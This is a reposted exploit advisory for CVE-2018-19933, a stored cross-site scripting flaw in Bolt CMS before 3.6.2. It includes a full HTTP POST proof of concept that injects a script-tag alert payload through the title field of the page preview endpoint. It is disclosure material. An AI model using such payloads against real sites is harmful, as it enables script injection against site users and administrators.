ExploitFixes
Bolt CMS < 3.6.2 - Cross-Site Scripting 2018-12-19 18:05:06

# Exploit Title: Bolt CMS &lt;3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm
# Vulnerable Software --&gt; [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ &lt; 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: &lt;script&gt;alert(&quot;Raif&quot;)&lt;/script&gt;

# Description

Bolt CMS &lt;3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.

# PoC [Video]: https://youtu.be/3eTPyIpjCJg

# Proof of Concepts:

POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit[_token]=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&amp;editreferrer=&amp;contenttype=pages&amp;title=<script>alert("Raif")</script>&amp;slug=script-alert-raif-script&amp;image[file]=&amp;files[]=&amp;teaser=&amp;body=&amp;template=&amp;taxonomy[groups][]=&amp;taxonomy-order[groups]=0&amp;id=&amp;status=draft&amp;datepublish=2018-12-07+00:12:05&amp;datedepublish=&amp;ownerid=1&amp;_live-editor-preview=